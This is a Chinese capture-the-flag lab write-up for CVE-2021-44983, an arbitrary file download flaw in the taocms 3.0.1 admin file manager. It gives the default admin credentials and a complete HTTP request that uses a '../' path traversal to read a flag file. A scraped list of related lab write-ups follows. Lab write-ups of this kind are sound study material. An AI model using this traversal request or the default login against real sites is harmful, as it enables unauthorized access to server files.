[春秋云镜]CVE-2021-44983
声明:⽂中所涉及的技术、思路和⼯具仅供以安全为⽬的的学习交流使⽤,任何⼈不得将其⽤于⾮法⽤途以及盈利等⽬的,否则后果⾃⾏承担。所有渗透都需获取授权!
靶场介绍
taocms 3.0.1 登陆后台后文件管理处存在任意文件下载漏洞
http://eci-2zefb60bjgrer0yafia3.cloudeci1.ichunqiu.com/
点击管理
http://eci-2zefb60bjgrer0yafia3.cloudeci1.ichunqiu.com/admin/admin.php?action=frame&ctrl=login
查看源代码可以获取到默认账号密码
账号admin 密码tao 登录进入后台
后台文件管理处
抓包点击下载index.php
修改为../../../../../../../flag
GET /admin/admin.php?action=file&ctrl=download&path=../../../../../../../flag HTTP/1.1
Host: eci-2zefb60bjgrer0yafia3.cloudeci1.ichunqiu.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:107.0) Gecko/20100101 Firefox/107.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Referer: http://eci-2zefb60bjgrer0yafia3.cloudeci1.ichunqiu.com/admin/admin.php?action=file&ctrl=lists
Cookie: Hm_lvt_2d0601bd28de7d49818249cf35d95943=1669168735,1669356938,1669368228,1669611172; Hm_lpvt_2d0601bd28de7d49818249cf35d95943=1669631036; PHPSESSID=ot8ji1hpq0uqgfpta31eqoinq3
Upgrade-Insecure-Requests: 1
成功获取到flag
flag{e2cf02c9-d731-435d-a538-aaf910dd5cd9}
[春秋云镜]CVE-2021-44983相关推荐
- 春秋云镜wp day1
春秋云镜wp day1 (qq.com) 建议关注公众号 websec.space,以后文章来csdn备份一份 今天看到之前买了内网渗透那本书,今天看到靶场上线了,打一天玩一下,总体cve的洞很好刷, ...
- 春秋云镜 CVE-2022-24223
春秋云镜 CVE-2022-24223 AtomCMS SQL注入漏洞 靶标介绍 Elite Graphix Elite Cms是印度Elite Graphix公司的一个用 Php 语言编写的 Web ...
- [春秋云镜]CVE-2022-23134
声明:⽂中所涉及的技术.思路和⼯具仅供以安全为⽬的的学习交流使⽤,任何⼈不得将其⽤于⾮法⽤途以及盈利等⽬的,否则后果⾃⾏承担.所有渗透都需获取授权! 靶场介绍 Zabbix Sia Zabbix是拉脱 ...
- [春秋云镜]CVE-2020-19960,CVE-2020-19961
声明:⽂中所涉及的技术.思路和⼯具仅供以安全为⽬的的学习交流使⽤,任何⼈不得将其⽤于⾮法⽤途以及盈利等⽬的,否则后果⾃⾏承担.所有渗透都需获取授权! 靶场介绍 zz cms 2019 存在sql注入漏 ...
- 【春秋云镜 CVE-2022-30887wp】
春秋云镜 CVE-2022-30887wp 开始愉快的打靶之旅吧 收集信息 任意文件上传 开始愉快的打靶之旅吧 春秋云镜链接 https://yunjing.ichunqiu.com 靶标介绍: 多语 ...
- [春秋云镜]CVE-2022-23043
声明:⽂中所涉及的技术.思路和⼯具仅供以安全为⽬的的学习交流使⽤,任何⼈不得将其⽤于⾮法⽤途以及盈利等⽬的,否则后果⾃⾏承担.所有渗透都需获取授权! 靶场介绍 Zenario CMS 9.2 文件上传 ...
- [春秋云镜]CVE-2022-2073
声明:⽂中所涉及的技术.思路和⼯具仅供以安全为⽬的的学习交流使⽤,任何⼈不得将其⽤于⾮法⽤途以及盈利等⽬的,否则后果⾃⾏承担.所有渗透都需获取授权! 靶场介绍 Grav CMS 可以通过 Twig 来 ...
- [春秋云镜]CVE-2022-24263
声明:⽂中所涉及的技术.思路和⼯具仅供以安全为⽬的的学习交流使⽤,任何⼈不得将其⽤于⾮法⽤途以及盈利等⽬的,否则后果⾃⾏承担.所有渗透都需获取授权! 靶场介绍 Hospital Management ...
- 春秋云镜 CVE-2022-24112
春秋云镜 CVE-2022-24112 Apache APISIX batch-requests SSRF RCE 漏洞 靶标介绍 Apache Apisix是美国阿帕奇(Apache)基金会的一个云 ...
- 春秋云镜 CVE-2022-22947
春秋云镜 CVE-2022-22947 Spring Cloud Gateway spel 远程代码执行 靶标介绍 Spring Cloud Gateway远程代码执行漏洞(CVE-2022-2294 ...
最新文章
- 一份火爆全网的刷题笔记分享!offer 到手!
- 【GoldenGate】使用OGG,两个Oracle库之间单向同步数据
- poj 3101 Astronomy (java 分数的最小公倍数 gcd)
- Python单元测试之pytest
- 关于make_work_guard猜想
- 你真的了解JavaScript的Promise吗?
- python web实战视频教程_Python Web开发实战【中级班】
- [转载] java调用c++的dll及java.lang.UnsatisfiedLinkError解决方法
- 项目需求:基于微信平台的拼团活动系统
- jitpack发布_JitPack –发布您的Android库
- Uva 1588.Kickdown
- MySQL—SQL优化笔记整理
- Android创建本地文件时没有权限的怪现象
- 埃加洛尔虚拟服务器,致我终将逝去的二区:新一轮大服务器实装
- 电视机顶盒CM311-1A-YST基于openwrt搭建pptpipsec服务器
- 固定资产拆分比例怎么计算_固定资产折旧的计算方法
- 2022年9月电子学会Python等级考试试卷(五级)答案解析
- 从Spring源码探究IOC初始化流程
- DrawIO怎么画出卡通效果的图?
- 计算机发展史资料简介,计算机发展史简介